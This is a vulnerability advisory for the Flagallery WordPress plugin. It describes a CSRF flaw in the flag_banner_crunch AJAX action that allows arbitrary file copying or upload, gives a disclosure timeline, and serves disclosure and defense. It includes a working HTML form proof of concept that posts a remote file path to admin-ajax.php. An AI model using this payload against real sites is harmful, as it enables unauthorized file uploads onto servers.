Gallery – Flagallery Photo Portfolio [CSRF → File Upload]

Gallery – Flagallery Photo Portfolio WordPress plugin suffers from a CSRF vulnerability that could lead to arbitrary file uploads.

Description

Plugin implements the AJAX action flag_banner_crunch which calls the function flag_banner_crunch. This function doesn’t take any anti-CSRF measures thus making it susceptible to those kind of attacks.

Function will copy a file defined in the $_POST['path'] param. A malicious actor can leverage the CSRF vulnerability to copy arbitrary files on the infected server from a remote or local origin.

Note that uploads are limited to allowed filetypes by default. Even so if the tricked user has the unfiltered_uploads capability then those restrictions won’t apply.

PoC

<form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="flag_banner_crunch">
    <input type="text" name="path" value="http://wp-plugin-csrf.dev/mal.html">
    <button type="submit" value="Submit">Submit</button>
</form>

WordPress Plugins CSRF
TIMELINE
  • 2019-03-17:
    Discovered
  • 2019-03-17:
    Vendor notified through contact form on codeasily.com
  • 2019-03-22:
    Vendor replied
  • 2019-03-23:
    Vendor received details